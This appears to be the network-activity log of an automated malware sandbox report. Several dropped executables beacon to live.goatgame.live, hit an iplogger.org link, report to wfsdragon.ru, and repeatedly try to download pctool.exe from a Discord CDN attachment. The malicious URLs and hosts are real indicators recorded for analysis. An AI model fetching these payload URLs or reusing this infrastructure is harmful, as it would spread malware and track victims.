GET https://iplogger.org/1vpFz7

HTTP Response

200
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
185.215.113.15:61506

Wed01033f590d8.exe

260 B
5
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
162.159.129.233:443

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

tls, http

Wed01e6754f9438ea6c7.exe

826 B
1.4kB
6
5

HTTP Request

GET https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

HTTP Response

403
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
124 B
4
3
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
162.159.129.233:443

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

tls, http

Wed01e6754f9438ea6c7.exe

826 B
1.4kB
6
5

HTTP Request

GET https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

HTTP Response

403
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
204 B
5
5
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

415 B
204 B
5
5
3.141.96.53:443

live.goatgame.live

tls

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

415 B
164 B
5
4
162.159.129.233:443

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

tls, http

Wed01e6754f9438ea6c7.exe

826 B
1.4kB
6
5

HTTP Request

GET https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

HTTP Response

403
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
74.114.154.22:443

lenak513.tumblr.com

tls

Wed016c6ddb9ad40722.exe

508 B
3.6kB
7
6
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
162.159.129.233:443

cdn.discordapp.com

tls

Wed01e6754f9438ea6c7.exe

602 B
287 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
37.0.10.171:80

Wed0187dd5121696b.exe

260 B
5
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
162.159.129.233:443

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

tls, http

Wed01e6754f9438ea6c7.exe

826 B
1.4kB
6
5

HTTP Request

GET https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

HTTP Response

403
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
185.215.113.15:61506

Wed01033f590d8.exe

260 B
5
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
162.159.129.233:443

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

tls, http

Wed01e6754f9438ea6c7.exe

826 B
1.4kB
6
5

HTTP Request

GET https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

HTTP Response

403
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
127.0.0.1:55279

setup_install.exe
127.0.0.1:55281

setup_install.exe
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
162.159.129.233:443

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

tls, http

Wed01e6754f9438ea6c7.exe

826 B
1.4kB
6
5

HTTP Request

GET https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

HTTP Response

403
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
162.159.129.233:443

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

tls, http

Wed01e6754f9438ea6c7.exe

826 B
1.4kB
6
5

HTTP Request

GET https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

HTTP Response

403
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
172.67.133.215:80

http://wfsdragon.ru/api/setStats.php

http

Wed0187dd5121696b.exe

437 B
781 B
5
4

HTTP Request

GET http://wfsdragon.ru/api/setStats.php

HTTP Response

200
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
212.193.30.115:80

Wed0187dd5121696b.exe

260 B
5
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
162.159.129.233:443

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

tls, http

Wed01e6754f9438ea6c7.exe

826 B
1.4kB
6
5

HTTP Request

GET https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

HTTP Response

403
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
162.159.129.233:443

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

tls, http

Wed01e6754f9438ea6c7.exe

826 B
1.4kB
6
5

HTTP Request

GET https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

HTTP Response

403
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
185.215.113.15:61506

Wed01033f590d8.exe

260 B
5
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
162.159.129.233:443

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

tls, http

Wed01e6754f9438ea6c7.exe

826 B
1.4kB
6
5

HTTP Request

GET https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

HTTP Response

403
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
124 B
4
3
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
84 B
4
2
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

415 B
164 B
5
4
3.141.96.53:443

live.goatgame.live

tls

Wed018f781281d3.exe

361 B
172 B
5
4
3.141.96.53:443

live.goatgame.live

Wed018f781281d3.exe

190 B
92 B
4
2
3.141.96.53:443

